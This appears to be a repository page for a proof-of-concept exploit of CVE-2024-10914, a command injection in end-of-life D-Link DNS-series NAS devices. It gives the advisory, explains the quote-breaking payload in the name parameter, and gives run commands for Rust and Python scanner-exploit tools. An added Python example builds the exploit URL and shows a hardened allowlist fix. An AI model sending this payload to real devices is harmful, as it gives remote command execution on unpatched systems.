CVE-2024-10914 PoC — D-Link DNS-320/DNS-320LW/DNS-325/DNS-340L account_mgr.cgi cgi_user_add os command injection

Source
Associated Vulnerability
Title: D-Link DNS-320/DNS-320LW/DNS-325/DNS-340L account_mgr.cgi cgi_user_add os command injection (CVE-2024-10914)
Description: A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used.
Description
dlink vulnerability thing in python and rust
Readme
# CVE-2024-10914 ported to rust and python
because why not

## what is this
cve-2024-10914 is a recently disclosed, critical-severity OS command injection that affects several D-Link DNS-series NAS devices (the DNS-320, DNS-320LW, DNS-325 and DNS-340L; these are network storage boxes, not routers). Because those devices have reached end of life, D-Link has said it will not patch the vulnerability and recommends retiring and replacing the hardware instead.

## how does this work
the vulnerable devices expose an http endpoint at `/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=<user_input>`. instead of validating `name` against a strict allowlist (for example, alphanumeric characters only), the CGI passes the value unchanged into a shell command string. any shell metacharacter in that value is therefore interpreted by the shell, which gives an attacker arbitrary command execution with the privileges of the CGI process.

by inserting shell metacharacters (such as `;`, `|`, `&` or `$(command)`) in the name field, anyone who can reach the web interface can run shell commands. the shape of the payload below implies that the value lands inside single quotes in the command string: the `'` after `admin` closes that quote, `;` terminates the original command, and the trailing `#` comments out the leftover closing quote so the shell does not reject the line as an unterminated string. for example:

`...name=admin'; echo 'get pwned bozo'; #`

(when sent over http the `'`, `;` and `#` characters must be percent-encoded; a raw `#` would be treated as a URL fragment and never reach the server.)

all these scripts do is send one request to that endpoint with the name parameter set to such a payload, wrapping whatever command you want to run.
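To make the quoting mechanics concrete, here is an added example written for this page; it is not code from this repository or from verylazytech's PoC. It assumes a hypothetical command template `adduser '{name}'` standing in for whatever account_mgr.cgi really runs (the real command is not on this page), tokenises the resulting string the way a POSIX shell would so you can see the injected second command, and sets that beside a hardened handler that validates the name against an allowlist and passes it as its own argv element rather than through a shell. `build_poc_url` assembles the request the README describes, with the payload percent-encoded; the host 192.0.2.10 is a documentation address.

```python
"""Added example: why the quote-breaking `name` payload works and what a
fixed handler looks like.  Not code from this repository or the original
PoC; the command template and host below are assumptions."""
from __future__ import annotations

import re
import shlex
from urllib.parse import urlencode, urljoin

# Assumption: the CGI pastes the attacker-controlled value into a shell
# command string shaped like this.  The real account_mgr.cgi command is not
# on the page; the bug is the string interpolation, not the specific command.
CMD_TEMPLATE = "adduser '{name}'"

# Allowlist a fixed handler would apply: first char alphanumeric or '_',
# then up to 31 alphanumerics, '_' or '-'.  Nothing the shell cares about.
NAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_-]{0,31}$")


def build_poc_url(base_url: str, shell_cmd: str) -> str:
    """Build the request the README describes: cmd=cgi_user_add with the
    README-style payload (admin'; <cmd>; #) in `name`.  urlencode
    percent-encodes ' ; and #; a raw # would be a URL fragment and would
    never reach the server."""
    payload = f"admin'; {shell_cmd}; #"
    query = urlencode({"cmd": "cgi_user_add", "name": payload})
    return urljoin(base_url, f"/cgi-bin/account_mgr.cgi?{query}")


def shell_commands_for(name: str) -> list[list[str]]:
    """Show what /bin/sh would execute for a given `name`: build the string
    the vulnerable handler would build, tokenise it with POSIX quoting rules
    (shlex honours quotes and treats # as a comment, like sh), and split it
    into separate commands at ';'.  Without the trailing # in the payload
    the leftover closing quote would make this raise 'No closing quotation',
    which is exactly why the PoC payload ends with #."""
    lexer = shlex.shlex(CMD_TEMPLATE.format(name=name), posix=True,
                        punctuation_chars=";")
    lexer.whitespace_split = True  # split on whitespace like a shell
    commands: list[list[str]] = []
    current: list[str] = []
    for tok in lexer:
        if tok == ";":          # command separator injected by the attacker
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def is_valid_name(name: str) -> bool:
    """Strict allowlist check; rejects every shell metacharacter."""
    return NAME_RE.fullmatch(name) is not None


def safe_argv(name: str) -> list[str]:
    """Hardened equivalent of CMD_TEMPLATE: validate, then hand the name to
    the program as its own argv element (subprocess.run(argv) with no
    shell=True), so the value is never re-parsed as shell syntax."""
    if not is_valid_name(name):
        raise ValueError(f"rejected user name: {name!r}")
    return ["adduser", name]


if __name__ == "__main__":
    payload = "admin'; echo injected; #"   # README-style payload (constructed)
    print(build_poc_url("http://192.0.2.10", "id"))
    print("vulnerable handler runs:", shell_commands_for(payload))
    try:
        safe_argv(payload)
    except ValueError as exc:
        print("hardened handler:", exc)
```

Note that `shell_commands_for` returns two commands for the payload but only one for a benign name such as `alice`; the fix is not to escape the metacharacters after the fact but to never let the value reach a shell parser at all, which is what `safe_argv` does.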

there's a pretty good video by Fireship that explains it in more detail: https://www.youtube.com/watch?v=52v6gKPA4TM

## how 2 use:

first you need a vulnerable device; affected models and firmware versions include:
- DNS-320 (Version 1.00)
- DNS-320LW (Version 1.01.0914.2012)
- DNS-325 (Versions 1.01, 1.02)
- DNS-340L (Version 1.08)

I strongly advise against using this script against someone else without their consent; please only do this stuff if you own the router or you have the owner's consent.

### rust
- if you already know the device ip address:
> `cargo run -- -u http://<device ip address>`
- if you want to perform a quick network scan:
> `cargo run`

### python
- first install dependencies
> `pip install -r requirements.txt`
- if you already know the device ip address:
> `python main.py -u http://<device ip address>`
- if you want to perform a quick network scan:
> `python main.py`

then follow the on-screen instructions

## credits

I did not come up with the original code; [verylazytech](https://github.com/verylazytech/) did. I only ported it to Rust and Python because why the fuck not. Of course all credit goes to him and anyone else involved in the discovery of this exploit.

https://github.com/verylazytech/CVE-2024-10914/
File Snapshot

[4.0K] /data/pocs/961638098286e8443636c0933b5e781bed140274
├── [ 47K] Cargo.lock
├── [ 246] Cargo.toml
├── [4.0K] main.py
├── [2.2K] README.md
├── [   8] requirements.txt
└── [4.0K] src
    └── [5.4K] main.rs

1 directory, 6 files